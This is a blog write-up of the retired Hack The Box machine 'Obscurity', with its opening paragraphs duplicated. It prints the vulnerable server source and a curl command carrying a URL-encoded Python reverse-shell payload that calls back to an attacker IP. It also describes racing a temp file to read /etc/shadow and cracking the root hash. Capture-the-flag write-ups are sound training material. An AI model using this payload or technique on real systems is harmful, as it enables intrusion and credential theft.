Hi,
Welcome to my blog!
Obscurity has just retired on Hack The Box. It's my third own box and I've learned many things from hacking it. In this post, I will write about my journey to the root flag of Obscurity.
There are only 2 open ports: 22 and 8080. The port 22 running SSH with a new version and doesn't have any real vulnerabilities. So, I stick to the port 8080, which runs a web service. Unfortunately, searching for "BadHTTPServer" on Google returns nothing usable.
Let's look at the web content.
The file SuperSecureServer.py must be in a subdirectory of the webroot. If you've coded a web application in Python, you may know that all paths are defined in source code and don't depend on the file system. Many people failed to brute force the unknown subdirectory because they haven't appended the filename when using tools like dirb, dirbuster,...
Here, I use wfuzz to brute force the subdirectory's name with a common wordlist.
Wow, the super-secret directory is "develop"! Perhaps simplicity is complicated. Again, you can notice that if you access the path /develop/, it will return 404 but /develop/SuperSecureServer.py will return the server's source code.
Analyzing the source code, I notice that it uses the function exec() with input from users. It's clear that the URL path from the incoming request.
There is an interesting file named SuperSecureCrypt.py. Ah! It might be insecure like the file SuperSecureServer.py above.
Open the file check.txt, it contains "Encrypting this file with your key should result in out.txt, make sure your key is correct!". At this point, I think the file out.txt is actually the encrypted text of the file check.txt. We have both c and m so it's easy to get the key now.
With the key "alexandrovich", I can decrypt the file passwordreminder.txt and get the user's password.
Now, I switch to the user robert and grab the user flag.
Anyway, don't forget the command sudo -l.
We have a hash, just use john to crack it!
Now, I switch to root and take the root flag.
If you have any questions, please don't hesitate to ask me on Twitter or leave a comment.
Thank you for reading!
Welcome to my blog!
Obscurity has just retired on Hack The Box. It's my third own box and I've learned many things from hacking it. In this post, I will write about my journey to the root flag of Obscurity.
I solved this box while I was preparing for my first OSCP attempt. The box'es name means "Security through Obsecurity"!
Port scan
As always, I use nmap to scan all ports of the machine.There are only 2 open ports: 22 and 8080. The port 22 running SSH with a new version and doesn't have any real vulnerabilities. So, I stick to the port 8080, which runs a web service. Unfortunately, searching for "BadHTTPServer" on Google returns nothing usable.
Let's look at the web content.
Initial shell
On the index page, I see an obvious hint.The file SuperSecureServer.py must be in a subdirectory of the webroot. If you've coded a web application in Python, you may know that all paths are defined in source code and don't depend on the file system. Many people failed to brute force the unknown subdirectory because they haven't appended the filename when using tools like dirb, dirbuster,...
Here, I use wfuzz to brute force the subdirectory's name with a common wordlist.
Wow, the super-secret directory is "develop"! Perhaps simplicity is complicated. Again, you can notice that if you access the path /develop/, it will return 404 but /develop/SuperSecureServer.py will return the server's source code.
Analyzing the source code, I notice that it uses the function exec() with input from users. It's clear that the URL path from the incoming request.
import socket
import threading
from datetime import datetime
import sys
import os
import mimetypes
import urllib.parse
import subprocess
respTemplate = """HTTP/1.1 {statusNum} {statusCode}
Date: {dateSent}
Server: {server}
Last-Modified: {modified}
Content-Length: {length}
Content-Type: {contentType}
Connection: {connectionType}
{body}
"""
DOC_ROOT = "DocRoot"
CODES = {"200": "OK",
"304": "NOT MODIFIED",
"400": "BAD REQUEST", "401": "UNAUTHORIZED", "403": "FORBIDDEN", "404": "NOT FOUND",
"500": "INTERNAL SERVER ERROR"}
MIMES = {"txt": "text/plain", "css":"text/css", "html":"text/html", "png": "image/png", "jpg":"image/jpg",
"ttf":"application/octet-stream","otf":"application/octet-stream", "woff":"font/woff", "woff2": "font/woff2",
"js":"application/javascript","gz":"application/zip", "py":"text/plain", "map": "application/octet-stream"}
class Response:
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
now = datetime.now()
self.dateSent = self.modified = now.strftime("%a, %d %b %Y %H:%M:%S")
def stringResponse(self):
return respTemplate.format(**self.__dict__)
class Request:
def __init__(self, request):
self.good = True
try:
request = self.parseRequest(request)
self.method = request["method"]
self.doc = request["doc"]
self.vers = request["vers"]
self.header = request["header"]
self.body = request["body"]
except:
self.good = False
def parseRequest(self, request):
req = request.strip("\r").split("\n")
method,doc,vers = req[0].split(" ")
header = req[1:-3]
body = req[-1]
headerDict = {}
for param in header:
pos = param.find(": ")
key, val = param[:pos], param[pos+2:]
headerDict.update({key: val})
return {"method": method, "doc": doc, "vers": vers, "header": headerDict, "body": body}
class Server:
def __init__(self, host, port):
self.host = host
self.port = port
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind((self.host, self.port))
def listen(self):
self.sock.listen(5)
while True:
client, address = self.sock.accept()
client.settimeout(60)
threading.Thread(target = self.listenToClient,args = (client,address)).start()
def listenToClient(self, client, address):
size = 1024
while True:
try:
data = client.recv(size)
if data:
# Set the response to echo back the recieved data
req = Request(data.decode())
self.handleRequest(req, client, address)
client.shutdown()
client.close()
else:
raise error('Client disconnected')
except:
client.close()
return False
def handleRequest(self, request, conn, address):
if request.good:
# try:
# print(str(request.method) + " " + str(request.doc), end=' ')
# print("from {0}".format(address[0]))
# except Exception as e:
# print(e)
document = self.serveDoc(request.doc, DOC_ROOT)
statusNum=document["status"]
else:
document = self.serveDoc("/errors/400.html", DOC_ROOT)
statusNum="400"
body = document["body"]
statusCode=CODES[statusNum]
dateSent = ""
server = "BadHTTPServer"
modified = ""
length = len(body)
contentType = document["mime"] # Try and identify MIME type from string
connectionType = "Closed"
resp = Response(
statusNum=statusNum, statusCode=statusCode,
dateSent = dateSent, server = server,
modified = modified, length = length,
contentType = contentType, connectionType = connectionType,
body = body
)
data = resp.stringResponse()
if not data:
return -1
conn.send(data.encode())
return 0
def serveDoc(self, path, docRoot):
path = urllib.parse.unquote(path)
try:
info = "output = 'Document: {}'" # Keep the output for later debug
exec(info.format(path)) # This is how you do string formatting, right?
cwd = os.path.dirname(os.path.realpath(__file__))
docRoot = os.path.join(cwd, docRoot)
if path == "/":
path = "/index.html"
requested = os.path.join(docRoot, path[1:])
if os.path.isfile(requested):
mime = mimetypes.guess_type(requested)
mime = (mime if mime[0] != None else "text/html")
mime = MIMES[requested.split(".")[-1]]
try:
with open(requested, "r") as f:
data = f.read()
except:
with open(requested, "rb") as f:
data = f.read()
status = "200"
else:
errorPage = os.path.join(docRoot, "errors", "404.html")
mime = "text/html"
with open(errorPage, "r") as f:
data = f.read().format(path)
status = "404"
except Exception as e:
print(e)
errorPage = os.path.join(docRoot, "errors", "500.html")
mime = "text/html"
with open(errorPage, "r") as f:
data = f.read()
status = "500"
return {"body": data, "mime": mime, "status": status}
Just put the payload in the URL and send with curl like this:curl -i "http://10.10.10.168:8080/%27%3Bimport%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%2210.10.14.180%22%2C4444%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3Bos.dup2%28s.fileno%28%29%2C2%29%3Bimport%20pty%3B%20pty.spawn%28%22/bin/bash%22%29%3B%27"
Then, I have a reverse shell.Own user
First, I list all the accessible files and folders in the user robert home directory.There is an interesting file named SuperSecureCrypt.py. Ah! It might be insecure like the file SuperSecureServer.py above.
import sys
import argparse
def encrypt(text, key):
keylen = len(key)
keyPos = 0
encrypted = ""
for x in text:
keyChr = key[keyPos]
newChr = ord(x)
newChr = chr((newChr + ord(keyChr)) % 255)
encrypted += newChr
keyPos += 1
keyPos = keyPos % keylen
return encrypted
def decrypt(text, key):
keylen = len(key)
keyPos = 0
decrypted = ""
for x in text:
keyChr = key[keyPos]
newChr = ord(x)
newChr = chr((newChr - ord(keyChr)) % 255)
decrypted += newChr
keyPos += 1
keyPos = keyPos % keylen
return decrypted
parser = argparse.ArgumentParser(description='Encrypt with 0bscura\'s encryption algorithm')
parser.add_argument('-i',
metavar='InFile',
type=str,
help='The file to read',
required=False)
parser.add_argument('-o',
metavar='OutFile',
type=str,
help='Where to output the encrypted/decrypted file',
required=False)
parser.add_argument('-k',
metavar='Key',
type=str,
help='Key to use',
required=False)
parser.add_argument('-d', action='store_true', help='Decrypt mode')
args = parser.parse_args()
banner = "################################\n"
banner+= "# BEGINNING #\n"
banner+= "# SUPER SECURE ENCRYPTOR #\n"
banner+= "################################\n"
banner += " ############################\n"
banner += " # FILE MODE #\n"
banner += " ############################"
print(banner)
if args.o == None or args.k == None or args.i == None:
print("Missing args")
else:
if args.d:
print("Opening file {0}...".format(args.i))
with open(args.i, 'r', encoding='UTF-8') as f:
data = f.read()
print("Decrypting...")
decrypted = decrypt(data, args.k)
print("Writing to {0}...".format(args.o))
with open(args.o, 'w', encoding='UTF-8') as f:
f.write(decrypted)
else:
print("Opening file {0}...".format(args.i))
with open(args.i, 'r', encoding='UTF-8') as f:
data = f.read()
print("Encrypting...")
encrypted = encrypt(data, args.k)
print("Writing to {0}...".format(args.o))
with open(args.o, 'w', encoding='UTF-8') as f:
f.write(encrypted)
As you see in the source code, the functions encrypt() and decrypt() just add and subtract the input with the key character by character. So, if I have m encrypted by k = c then c decrypted by m = k.Open the file check.txt, it contains "Encrypting this file with your key should result in out.txt, make sure your key is correct!". At this point, I think the file out.txt is actually the encrypted text of the file check.txt. We have both c and m so it's easy to get the key now.
With the key "alexandrovich", I can decrypt the file passwordreminder.txt and get the user's password.
Now, I switch to the user robert and grab the user flag.
Own root
Do you remember the folder BetterSSH when we listed inside robert's home directory above? It contains a file named BetterSSH.py.import sys
import random, string
import os
import time
import crypt
import traceback
import subprocess
path = ''.join(random.choices(string.ascii_letters + string.digits, k=8))
session = {"user": "", "authenticated": 0}
try:
session['user'] = input("Enter username: ")
passW = input("Enter password: ")
with open('/etc/shadow', 'r') as f:
data = f.readlines()
data = [(p.split(":") if "$" in p else None) for p in data]
passwords = []
for x in data:
if not x == None:
passwords.append(x)
passwordFile = '\n'.join(['\n'.join(p) for p in passwords])
with open('/tmp/SSH/'+path, 'w') as f:
f.write(passwordFile)
time.sleep(.1);exit()
salt = ""
realPass = ""
for p in passwords:
if p[0] == session['user']:
salt, realPass = p[1].split('$')[2:]
break
if salt == "":
print("Invalid user")
os.remove('/tmp/SSH/'+path)
sys.exit(0)
salt = '$6$'+salt+'$'
realPass = salt + realPass
hash = crypt.crypt(passW, salt)
if hash == realPass:
print("Authed!")
session['authenticated'] = 1
else:
print("Incorrect pass")
os.remove('/tmp/SSH/'+path)
sys.exit(0)
os.remove(os.path.join('/tmp/SSH/',path))
except Exception as e:
traceback.print_exc()
sys.exit(0)
if session['authenticated'] == 1:
while True:
command = input(session['user'] + "@Obscure$ ")
cmd = ['sudo', '-u', session['user']]
cmd.extend(command.split(" "))
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
o,e = proc.communicate()
print('Output: ' + o.decode('ascii'))
print('Error: ' + e.decode('ascii')) if len(e.decode('ascii')) > 0 else print('')
After analyzing the source code, I found that if we input the right password for root, we can get root privilege. Of course, if we have, we don't need that file at all. However, that file does a very strange thing, it will write the /etc/shadow's content to one file inside /tmp/SSH with a random name. Although it will delete that file after checking completely, we can take advantage of the time gap and read the root password. I write a simple Python 3 script to do this.Anyway, don't forget the command sudo -l.
We have a hash, just use john to crack it!
Now, I switch to root and take the root flag.
My lesson learned
- You should not use your home-designed cryptographic algorithm, it's not well tested and will be break easily!
If you have any questions, please don't hesitate to ask me on Twitter or leave a comment.
Thank you for reading!
Comments
Post a Comment